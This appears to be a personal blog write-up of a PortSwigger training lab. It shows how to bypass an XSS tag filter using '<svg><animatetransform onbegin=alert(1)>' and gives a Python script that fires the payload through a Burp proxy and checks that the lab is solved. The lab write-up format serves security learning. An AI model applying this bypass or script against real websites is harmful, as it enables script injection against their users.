Shubham Ranpise

Back

XSS Lab 16

Exploiting XSS when common tags are blocked but SVG tags and events are allowed.

portswigger-labs content

Reflected XSS with some SVG markup allowed#

This lab demonstrates a simple reflected cross-site scripting (XSS) vulnerability where common HTML tags are blocked. However, certain SVG tags and attributes are not filtered properly, allowing us to execute JavaScript and trigger the alert() function.

How Exploit Works#

  • Standard payloads like <img src=1 onerror=alert(1)> are blocked.
  • Using Burp Intruder, we test different tags and attributes from the XSS cheat sheet.
  • Tags like <svg> and <animatetransform> are allowed.
  • Among events, onbegin works with <animatetransform>.
  • Final payload that triggers an alert:
<svg><animatetransform onbegin=alert(1)>
plaintext

Usage#

python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmd

Exploit#

exploit.py
import requests
import sys
import urllib3

# Disable SSL warnings for Burp Suite
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set Burp Suite proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

def check_burp():
    # Check if Burp Suite is running and listening on the configured proxy.

    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)

def exploit_xss(url, payload):
    # Exploit XSS in search parameter.
        uri = f"/?search={payload}"
        res = requests.get(url + uri, verify=False, proxies=proxies)
        res.raise_for_status()
        session = requests.Session()
        res = session.get(url, verify=False, proxies=proxies)
        if "Congratulations" in res.text:
            print("[+] Lab solved 🎉")
            return True
        else:
            print("[-] lab not solved.")

def main():
    # Entry point of the script.

    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        print(f"Example: python {sys.argv[0]} https://example.com")
        sys.exit(1)

    url = sys.argv[1].strip()

    # Step 1: Check Burp Suite
    check_burp()

    # Step 2: Define XSS payload
    payload = f"https://{url}/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E"

    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
python

See more portswigger-labs